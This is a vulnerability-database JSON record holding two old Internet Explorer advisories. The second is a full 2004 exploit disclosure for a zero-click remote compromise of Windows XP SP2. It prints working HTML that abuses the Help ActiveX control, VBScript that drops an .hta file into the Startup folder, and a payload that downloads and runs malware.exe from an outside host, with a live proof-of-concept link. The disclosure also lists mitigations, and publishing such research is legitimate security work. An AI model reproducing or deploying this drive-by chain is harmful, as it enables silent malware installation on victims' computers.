{"securityvulns": [{"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "DHTML ActiveX and Help allows code injection into context of different server. By combining this vulnerability it's psosible to execute code in local machine zone. This vulnerability can potentially be used for silent spyware/adware installation.", "modified": "2005-02-09T00:00:00", "published": "2005-02-09T00:00:00", "id": "SECURITYVULNS:VULN:4264", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:4264", "title": "Microsoft Internet Explorer DHTML Edit and Help ActiveX crossite scripting", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "\r\n\r\nMicrosoft Internet Explorer SP2 Fully Automated Remote Compromise\r\n\r\nDec, 21 2004\r\n\r\n\r\nVulnerable\r\n----------\r\n- Microsoft Internet Explorer 6.0\r\n- Microsoft Windows XP Pro SP2\r\n- Microsoft Windows XP Home SP2\r\n\r\n\r\nNot Tested\r\n------------------------\r\n- Microsoft Windows 98\r\n- Microsoft Internet Explorer 5.x\r\n- Microsoft Windows 2003 Server\r\n\r\n \r\n\r\nSeverity\r\n---------\r\nCritical - Remote code execution, no user intervention\r\n\r\n\r\nIntro\r\n------\r\nAlthough hundreds of millions of dollars have been spent on securing SP2, perfection is impossible.\r\nThrough the joint effort of Michael Evanchik (http://www.michaelevanchik.com) and Paul from Greyhats\r\nSecurity (http://greyhats.cjb.net), a very critical vulnerability has been developed that can compromise a\r\nuser's system without the need for user interaction besides visiting the malicious page. The vulnerability\r\nis not actually a vulnerability in itself, but rather it is uses multiple known holes in SP2 including Help\r\nActiveX Control Related Topics Zone Security Bypass Vulnerability and Help ActiveX Control Related Topics\r\nCross Site Scripting Vulnerability. \r\n\r\n\r\nTech Stuff and Explanation\r\n--------------------------\r\n\r\n1. Create a webpage with the following code:\r\n\r\nsp2rc.htm\r\n---------------------------------------------------------------------\r\n<OBJECT id="localpage" type="application/x-oleobject"\r\nclassid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%\r\nstyle="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194"\r\nwidth="7%">\r\n<PARAM name="Command" value="Related Topics, MENU">\r\n<PARAM name="Button" value="Text:Just a button">\r\n<PARAM name="Window" value="$global_blank">\r\n<PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">\r\n</OBJECT>\r\n\r\n<OBJECT id="inject" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"\r\nheight=7%\r\nstyle="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194"\r\nwidth="7%">\r\n<PARAM name="Command" value="Related Topics, MENU">\r\n<PARAM name="Button" value="Text:Just a button">\r\n<PARAM name="Window" value="$global_blank">\r\n<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script\r\nlanguage=\\\"vbscript\\\"\r\nsrc=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>\r\n</OBJECT>\r\n\r\n<script>\r\nlocalpage.HHClick();\r\nsetTimeout("inject.HHClick()",100);\r\n</script>\r\n---------------------------------------------------------------------\r\n\r\nExplanation of above code:\r\nThe first object (id: localpage) tells hhctrl.ocx to open a help popup window to the location\r\nC:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm. This file was chosen because it is treated as the\r\nlocal zone and it doesn't have any script to mess us up. On some computers an error is shown before the\r\npopup. This is the user's only chance to prevent the vulnerability from working. If the user were to force\r\nhis computer to shut down at this point, the user would be unaffected by the exploit.\r\n\r\nThe second object (id: inject) tells the help popup to navigate to a javascript protocol, which executes.\r\nThus, cross site scripting has just taken place. A script tag that uses a remote file is written to the\r\npage, and writehta.txt (below) is executed in the unsecured local zone.\r\n\r\nIn the script, HHClick is able to be used to automate the vulnerability. This is more effective than the\r\npreviously described method of requiring a user to click on a button.\r\n\r\n\r\n2. Writehta.txt uses adodb recordset to write Microsoft Office.hta to the user's startup folder. See\r\nMichael Evanchik's analysis of the drag and drop vulnerability for an explanation on adodb recordset.\r\n\r\nwritehta.txt\r\n---------------------------------------------------------------------\r\nDim Conn, rs\r\nSet Conn = CreateObject("ADODB.Connection")\r\nConn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _\r\n"Dbq=http://www.malware.com;" & _\r\n"Extensions=asc,csv,tab,txt;" & _\r\n"Persist Security Info=False"\r\nDim sql\r\nsql = "SELECT * from foobar.txt"\r\nset rs = conn.execute(sql)\r\nset rs =CreateObject("ADODB.recordset")\r\nrs.Open "SELECT * from foobar.txt", conn\r\nrs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta",\r\nadPersistXML\r\nrs.close\r\nconn.close\r\nwindow.close\r\n---------------------------------------------------------------------\r\n\r\n\r\n3. f00bar.txt (thanks malware for hosting this file) is the file requested by the adodb recordset (again,\r\nread the drag and drop analysis at www.michaelevanchik.com for an explanation on how this works and why the\r\nthe f00bar.txt looks like it does). Because there is absolutely no limit on what you can do in an hta file,\r\nan old, yet effective method of requesting and saving a file to the user's hd is used. From that, a wscript\r\nshell is created and used to run the program. And now, ladies and gentlemen, we have compromised the user's\r\nmachine.\r\n\r\nf00bar.txt\r\n---------------------------------------------------------------------\r\n"meaning less shit i had to put here"\r\n"<script language=vbscript> crap = """\r\n""": on error resume next: crap = """\r\n""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""\r\n""" : o.open ""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False : crap="""\r\n""" : o.send : crap="""\r\n""" : set s = createobject(""adodb.stream"") : crap="""\r\n""" : s.type=1 : crap="""\r\n""" : s.open : crap="""\r\n""" : s.write o.responseBody : crap="""\r\n""" : s.savetofile ""C:\malware.exe"",2 : crap="""\r\n""" : Set ws = CreateObject(""WScript.Shell"") : crap="""\r\n""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""\r\n"""</script> crap="""\r\n---------------------------------------------------------------------\r\n\r\n\r\n4. Upload hhtctrl.ocx for the computers that don\u2019t happen to have this control. All XP's seem to have\r\nthis by default, some win2k3's do not (according to Michael Evanchik)\r\n\r\n\r\nProof of Concept?\r\n------------------\r\n- http://freehost07.websamba.com/greyhats/sp2rc.htm\r\n\r\n- If an error is shown, press OK. This is normal.\r\n\r\n- Notice in your startup menu a new file called Microsoft Office.hta. When run, this file will download\r\nand launch a harmless executable (which includes a pretty neat fire animation) \r\n\r\n \r\n\r\nVendor Recommendations\r\n----------------------\r\n- Like Michael Evanchik said in his previous analysis, Microsoft needs to apply XP Service Pack 2's local\r\nzone lockdown to .HTA files as well.\r\n\r\n- This might be a little farfetched, but it would solve a lot of problems: Take out the startup folder and\r\nonly support running files during startup through the registry. The startup folder is a major part of this\r\nvulnerability and I can almost gaurantee it will be used for another remote compromise.\r\n\r\n- Microsoft could possibly take HTA files out altogether. I have not seen them used for anything beyond\r\nhacking.\r\n\r\n- No vulnerability is too small or too insignificant to be taken seriously. Treat every vulnerability as\r\nif it could be dangerous. \r\n\r\n \r\n\r\nUser Recommendations\r\n---------------------\r\n- Disable hta files.\r\n- Get yourself antivirus software. I recommend symantic because once they get their lazy asses off the\r\ncouch and fix some of this stuff you will be a lot better off.\r\n- Disable active scripting in Internet Explorer. If nothing else, do this.\r\n- Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox www.mozilla.org)\r\n\r\n \r\n\r\nCredit\r\n------\r\nPaul from Greyhats\r\nMichael Evanchik\r\nHttp equiv (thanks for allowing me to use your server for f00bar.txt)\r\n\r\n\r\nGreets\r\n------\r\n- Liu Die Yu (all the work you've done is amazing)\r\n\r\n\r\nContact\r\n-------\r\npaul@greyhats.cjb.net\r\nhttp://greyhats.cjb.net\r\nhttp://michaelevanchik.com", "modified": "2004-12-27T00:00:00", "published": "2004-12-27T00:00:00", "id": "SECURITYVULNS:DOC:7451", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7451", "title": "Microsoft Internet Explorer SP2 Fully Automated Remote Compromise", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}